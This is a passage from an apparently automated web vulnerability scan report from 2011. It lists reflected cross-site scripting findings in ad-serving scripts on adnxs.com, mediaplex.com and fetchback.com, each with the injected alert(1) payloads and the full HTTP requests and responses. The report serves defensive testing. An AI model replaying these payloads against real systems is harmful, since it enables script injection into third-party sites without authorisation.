GET /ab?enc=AAAAAAAAEEBSuB6F61EMQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAaBkpOgAAAAA.&tt_code=nypost.com&udj=uf%28%27a%27%2C+22407%2C+1317129667%29%3Buf%28%27c%27%2C+133618%2C+1317129667%29%3Buf%28%27r%27%2C+552613%2C+1317129667%29%3Bppv%2815706%2C+%272800731018487898349%27%2C+1317129667%2C+1317388867%2C+133618%2C+25661%29%3B&cnd=!0xxHWwjykwgQpd0hGAAgvcgBMAA425kBQABI2AdQAFgAYHhoAHAGeNrlAoABPIgBuMABkAEBmAEBoAEBqAECsAEAuQEAAAAAAAAQQMEBAAAAAAAAEEDJAYwKeWi8598_2QEAAAAAAADwP-ABAA..&ccd=!BwXkKQjykwgQpd0hGL3IASAA27052'-alert(1)-'615e9ecc7a&referrer=http://www.nypost.com&media_subtypes=1&pp=AAABMqsLw59zoXi-X98sGtv-L6HzL-Gqudflhw&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Tue, 14-Sep-2021 13:21:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 27 Sep 2011 13:21:47 GMT
Content-Length: 819

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA27052'-alert(1)-'615e9ecc7a/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1
...[SNIP]...

2.234. http://img.mediaplex.com/cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3caac"%3balert(1)//bf8017ef946 was submitted in the mpck parameter. This input was echoed as 3caac";alert(1)//bf8017ef946 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js?mpck=rover.ebay.com%2Frover%2F1%2F711-53200-19255-31%2F1%3Fp9m%3D1%26def%3Dv1e%26m9q%3D1%26b4x%3D1%26y6d%3D1%26v1e%3D1%26l3s%3D1%26customid%3D%26k4v%3D1%26x6n%3D1%26mpt%3D656572302337%26z5m%3D1%26toolid%3D55980%26n3y%3D1%26u7v%3D1%26a3h%3D1%26campid%3D5335919223%26rvr_id%3D268897513840%26imp_rvr_id%3D2688975138403caac"%3balert(1)//bf8017ef946&p9m=1&def=v1e&m9q=1&b4x=1&y6d=1&v1e=1&l3s=1&customid=&k4v=1&x6n=1&mpt=656572302337&z5m=1&toolid=55980&n3y=1&u7v=1&a3h=1&campid=5335919223&rvr_id=268897513840&imp_rvr_id=268897513840&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://rbc.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:27:03 GMT
Server: Apache
Last-Modified: Thu, 15 Oct 2009 18:38:13 GMT
ETag: "4f5bbb-a30-475fd94f36f40"
Accept-Ranges: bytes
Content-Length: 3066
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = escape("rover.ebay.com/rover/1/711-53200-19255-31/1?p9m=1&def=v1e&m9q=1&b4x=1&y6d=1&v1e=1&l3s=1&customid=&k4v=1&x6n=1&mpt=656572302337&z5m=1&toolid=55
...[SNIP]...
11-53200-19255-31/1?p9m=1&def=v1e&m9q=1&b4x=1&y6d=1&v1e=1&l3s=1&customid=&k4v=1&x6n=1&mpt=656572302337&z5m=1&toolid=55980&n3y=1&u7v=1&a3h=1&campid=5335919223&rvr_id=268897513840&imp_rvr_id=2688975138403caac";alert(1)//bf8017ef946\" TARGET=\"_blank\">
...[SNIP]...

2.235. http://img.mediaplex.com/cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49176"%3balert(1)//78aa74283fd was submitted in the mpvc parameter. This input was echoed as 49176";alert(1)//78aa74283fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js?mpck=rover.ebay.com%2Frover%2F1%2F711-53200-19255-31%2F1%3Fp9m%3D1%26def%3Dv1e%26m9q%3D1%26b4x%3D1%26y6d%3D1%26v1e%3D1%26l3s%3D1%26customid%3D%26k4v%3D1%26x6n%3D1%26mpt%3D656572302337%26z5m%3D1%26toolid%3D55980%26n3y%3D1%26u7v%3D1%26a3h%3D1%26campid%3D5335919223%26rvr_id%3D268897513840%26imp_rvr_id%3D268897513840&p9m=1&def=v1e&m9q=1&b4x=1&y6d=1&v1e=1&l3s=1&customid=&k4v=1&x6n=1&mpt=656572302337&z5m=1&toolid=55980&n3y=1&u7v=1&a3h=1&campid=5335919223&rvr_id=268897513840&imp_rvr_id=268897513840&mpvc=49176"%3balert(1)//78aa74283fd HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://rbc.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:27:05 GMT
Server: Apache
Last-Modified: Thu, 15 Oct 2009 18:38:13 GMT
ETag: "4f5bbb-a30-475fd94f36f40"
Accept-Ranges: bytes
Content-Length: 3148
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = escape("rover.ebay.com/rover/1/711-53200-19255-31/1?p9m=1&def=v1e&m9q=1&b4x=1&y6d=1&v1e=1&l3s=1&customid=&k4v=1&x6n=1&mpt=656572302337&z5m=1&toolid=55
...[SNIP]...
<PARAM NAME=FlashVars VALUE=\"clickTAG=49176";alert(1)//78aa74283fdhttp://"+mpck_encode+"\">
...[SNIP]...

2.236. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 724c4%3balert(1)//6766ebf9e39 was submitted in the imp_rvr_id parameter. This input was echoed as 724c4;alert(1)//6766ebf9e39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-17023-4%2F4%3Fmpt%3D634527120591651702%26siteid%3D0%26adid%3D344612%26fcid%3D344602%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D62d7951f1320a479e7268c86ff361dd1505b7d0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D268883596581%26imp_rvr_id%3D268883596581&mpt=634527120591651702&siteid=0&adid=344612&fcid=344602&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=62d7951f1320a479e7268c86ff361dd1505b7d0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=268883596581&imp_rvr_id=268883596581724c4%3balert(1)//6766ebf9e39&mpvc=http%3A%2F%2Fa1.interclick.com%2Ficaid%2F181817%2Ftid%2Ff4587281-8f12-4d6f-823b-54c425cf43d1%2Fclick.ic%3F HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1317129672826&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:09 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 3468
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck268883596581724c4;alert(1)//6766ebf9e39\">" );
var rvr_id=268883596581724c4;alert(1)//6766ebf9e39;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";
var mpcrgif="711/131750/83647_US_2011_Q3_Pattern_Default_728x90.jpg";
var mpck="rover.e
...[SNIP]...

2.237. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c228f"%3balert(1)//b8a8f52582c was submitted in the imp_rvr_id parameter. This input was echoed as c228f";alert(1)//b8a8f52582c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-17023-4%2F4%3Fmpt%3D634527120591651702%26siteid%3D0%26adid%3D344612%26fcid%3D344602%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D62d7951f1320a479e7268c86ff361dd1505b7d0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D268883596581%26imp_rvr_id%3D268883596581&mpt=634527120591651702&siteid=0&adid=344612&fcid=344602&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=62d7951f1320a479e7268c86ff361dd1505b7d0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=268883596581&imp_rvr_id=268883596581c228f"%3balert(1)//b8a8f52582c&mpvc=http%3A%2F%2Fa1.interclick.com%2Ficaid%2F181817%2Ftid%2Ff4587281-8f12-4d6f-823b-54c425cf43d1%2Fclick.ic%3F HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1317129672826&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:07 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 3470
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck268883596581c228f";alert(1)//b8a8f52582c\">" );
var rvr_id=268883596581c228f";alert(1)//b8a8f52582c;
var mpserv;

...[SNIP]...

2.238. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ed2"%3balert(1)//8a4783a320a was submitted in the mpck parameter. This input was echoed as d8ed2";alert(1)//8a4783a320a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-17023-4%2F4%3Fmpt%3D634527120591651702%26siteid%3D0%26adid%3D344612%26fcid%3D344602%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D62d7951f1320a479e7268c86ff361dd1505b7d0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D268883596581%26imp_rvr_id%3D268883596581d8ed2"%3balert(1)//8a4783a320a&mpt=634527120591651702&siteid=0&adid=344612&fcid=344602&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=62d7951f1320a479e7268c86ff361dd1505b7d0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=268883596581&imp_rvr_id=268883596581&mpvc=http%3A%2F%2Fa1.interclick.com%2Ficaid%2F181817%2Ftid%2Ff4587281-8f12-4d6f-823b-54c425cf43d1%2Fclick.ic%3F HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1317129672826&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:05 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 3472
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck268883596581\">" );
var rvr_id=268883596581;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
r_DAP_I132=1&ir_DAP_I133=62d7951f1320a479e7268c86ff361dd1505b7d0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=268883596581&imp_rvr_id=268883596581d8ed2";alert(1)//8a4783a320a";
var mpcke="<mpcke/>
...[SNIP]...

2.239. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b520f"%3balert(1)//bce05ff208b was submitted in the mpvc parameter. This input was echoed as b520f";alert(1)//bce05ff208b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-17023-4%2F4%3Fmpt%3D634527120591651702%26siteid%3D0%26adid%3D344612%26fcid%3D344602%26ir_DAP_I131%3D2%26ir_DAP_I132%3D1%26ir_DAP_I133%3D62d7951f1320a479e7268c86ff361dd1505b7d0d%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D268883596581%26imp_rvr_id%3D268883596581&mpt=634527120591651702&siteid=0&adid=344612&fcid=344602&ir_DAP_I131=2&ir_DAP_I132=1&ir_DAP_I133=62d7951f1320a479e7268c86ff361dd1505b7d0d&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=268883596581&imp_rvr_id=268883596581&mpvc=http%3A%2F%2Fa1.interclick.com%2Ficaid%2F181817%2Ftid%2Ff4587281-8f12-4d6f-823b-54c425cf43d1%2Fclick.ic%3Fb520f"%3balert(1)//bce05ff208b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1317129672826&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:22:11 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:27:32 GMT
ETag: "5e03a8-9f4-4a82327ce5d00"
Accept-Ranges: bytes
Content-Length: 3472
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck268883596581\">" );
var rvr_id=268883596581;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
<mpvce/>";
var mpvc="http://a1.interclick.com/icaid/181817/tid/f4587281-8f12-4d6f-823b-54c425cf43d1/click.ic?b520f";alert(1)//bce05ff208b";
var bangmpvc="http%3A%2F%2Fa1.interclick.com%2Ficaid%2F181817%2Ftid%2Ff4587281-8f12-4d6f-823b-54c425cf43d1%2Fclick.ic%3Fb520f"%3balert(1)//bce05ff208b";
var mpcrw="72
...[SNIP]...

2.240. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aeea"-alert(1)-"00a67e03bc6 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D7aeea"-alert(1)-"00a67e03bc6&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129672_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 758

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...
et%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D7aeea"-alert(1)-"00a67e03bc6&tid=68326&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.241. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaf5d"-alert(1)-"7327d8aa32e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect&eaf5d"-alert(1)-"7327d8aa32e=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
